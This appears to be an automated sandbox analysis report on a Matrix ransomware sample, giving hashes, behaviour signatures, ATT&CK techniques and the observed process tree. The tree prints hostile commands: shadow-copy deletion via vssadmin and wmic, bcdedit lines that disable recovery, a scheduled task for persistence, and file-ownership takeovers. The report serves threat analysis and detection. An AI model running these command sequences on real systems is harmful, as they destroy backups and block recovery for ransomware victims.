Analysis
-
max time kernel
150s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
28-12-2022 18:35
General
-
Target
2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
-
Size
1.2MB
-
MD5
6411153c8a95e8c77127d99c75595604
-
SHA1
02e6b8baed744a6b0c78baddf1720654688e5642
-
SHA256
2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3
-
SHA512
65f8479bb477d76af915811b44a06bc4ca076955d22e6d3cdc336f6e3c7d7299ef52da81aa3d13f6f5f9170ba5b9ac049fe67edc1df0a8899e8a4b7b03a82ade
-
SSDEEP
24576:+/SA+2lraRrjSJR5ezmT1dM9fB3NIDreFqO:yXlCIfe
Malware Config
Extracted
http://myexternalip.com/raw
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 3 IoCs
-
Sets service image path in registry 2 TTPs 1 IoCs
-
UPX packed file 3 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 29 IoCs
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 49 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe"C:\Users\Admin\AppData\Local\Temp\2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe"1⤵
- Matrix Ransomware
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe" "C:\Users\Admin\AppData\Local\Temp\NW1lWznw.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\NW1lWznw.exe"C:\Users\Admin\AppData\Local\Temp\NW1lWznw.exe" -n2⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\3eYJeJpi.txt"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Y14Gi9NT.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Y14Gi9NT.bmp" /f3⤵
- Sets desktop wallpaper using registry
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\YQNlwpHd.vbs"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\YQNlwpHd.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\dGp89tLF.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\dGp89tLF.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GZh5nylM.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib -R -A -S "C:\Users\All Users\USOPrivate\UpdateStore\store.db"3⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c t7bUFRUw.exe -accepteula "store.db" -nobanner3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\t7bUFRUw.exet7bUFRUw.exe -accepteula "store.db" -nobanner4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\t7bUFRUw64.exet7bUFRUw.exe -accepteula "store.db" -nobanner5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Sets service image path in registry
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\dGp89tLF.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet2⤵
- Interacts with shadow copies
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F2⤵
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Persistence
Hidden Files and Directories
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
File Deletion
2File and Directory Permissions Modification
1Hidden Files and Directories
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5bf2e20a79a066ec5e160ff0eeb92336a
SHA1814efa8b301955cb076a38f5ee1ab14574fec115
SHA2564cf925ebe4dd3d72d1e13692489258c9fdd80f57574a96126cb036d338a5e244
SHA512503194160be3eed9b1877bf09e383b3737499fcb63fa69c2f79255987bb889ab67709683a1d5245f7dda3b44ea48f907d5a827c953da14b6b31374ee1168e8ab
-
Filesize
3KB
MD5036a07e0d6cd8073a5bf95f6b3a9c8d3
SHA1ae9b958981050064b5f95925d66d50153852ffd0
SHA2561fa0657f909f21ddce746bc9f60376fd51bfeb11f43bc380193489eff78b8a65
SHA51200dd632f0513b2b7fb1deaa3cd67652b0379f777fbb4252755586d875bb1142ba0c612f2d1ae2f5d02eeb71694edff6971c8585acb78d76314f1bfd1b4e73a70
-
Filesize
14B
MD58eb51985066cb0782077f624013d47a2
SHA10549d07d51454e73b937946ba1887cacfce71835
SHA2565537d10911f09132033b185344f75ea1a0ed7e5509b3be00bd8bc93d477baa44
SHA512539a7160bb41366a74d8859b080724f5838132428f672c2bba7ef9c9a259823f15074adec75567bea6724f09d681c04b8763a2f495eff3436ff17420cb7bf0f5
-
Filesize
246B
MD580d252466386dbdb45af0df87b440ea6
SHA1cce89b93b8fbb57ef936a54ea50b93cf8c038b37
SHA256893814a6d5411a2183a44704214e940439ff66b05968a10265aa8f0319089921
SHA512a944cb4f9ee1b31d07da76c57f9ca089c313b80b9970c745e7388442dfce12c96c4ff39cd3497cbdb39eb2437f42f972828387cadb2052624f5b60d342df146b
-
Filesize
1.2MB
MD56411153c8a95e8c77127d99c75595604
SHA102e6b8baed744a6b0c78baddf1720654688e5642
SHA2562d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3
SHA51265f8479bb477d76af915811b44a06bc4ca076955d22e6d3cdc336f6e3c7d7299ef52da81aa3d13f6f5f9170ba5b9ac049fe67edc1df0a8899e8a4b7b03a82ade
-
Filesize
1.2MB
MD56411153c8a95e8c77127d99c75595604
SHA102e6b8baed744a6b0c78baddf1720654688e5642
SHA2562d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3
SHA51265f8479bb477d76af915811b44a06bc4ca076955d22e6d3cdc336f6e3c7d7299ef52da81aa3d13f6f5f9170ba5b9ac049fe67edc1df0a8899e8a4b7b03a82ade
-
Filesize
181KB
MD52f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
Filesize
181KB
MD52f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
Filesize
221KB
MD53026bc2448763d5a9862d864b97288ff
SHA17d93a18713ece2e7b93e453739ffd7ad0c646e9e
SHA2567adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
SHA512d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6
-
Filesize
221KB
MD53026bc2448763d5a9862d864b97288ff
SHA17d93a18713ece2e7b93e453739ffd7ad0c646e9e
SHA2567adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
SHA512d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6
-
Filesize
260B
MD5fed840b45dc3354df02b97f2579635ca
SHA1db7e275d57f53d1782c5a2dbcfb06a76a905e025
SHA25626b02226370489b12ef7302b42893e0059cd324b66e1ac5ec3887a001a112003
SHA512266332284a1e2b23444250d2ecc6ab965eb4aae9d23ea71be0ddf63b76259ee719ec068b9579b21451b96de8b7692ff8357f0dbd25d3d3b838c928bf206ff125
-
Filesize
265B
MD520356ff34c140f64e238e3a45a44623d
SHA1e2b02ec3de12b8f999dc47555c81a01a60111af1
SHA256d34e11758c3fe53d2351f6d518887f7484c5316abb9dbd22b367532437d84797
SHA512f5969a20b65a76ccab1760a206e4eea5af842a1518aa6bd448529f0a8786ad943bd24f87d5afc6c97a6a67df6dbefa440cde9fdf3516350203e040b1db83a5f2
-
-
-
Filesize
120KB
-
Filesize
408KB
-
-
Filesize
104KB
-
Filesize
216KB
-
Filesize
6.2MB
-
Filesize
136KB
-
Filesize
6.5MB
-
Filesize
408KB
-
-
-
Filesize
476KB
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-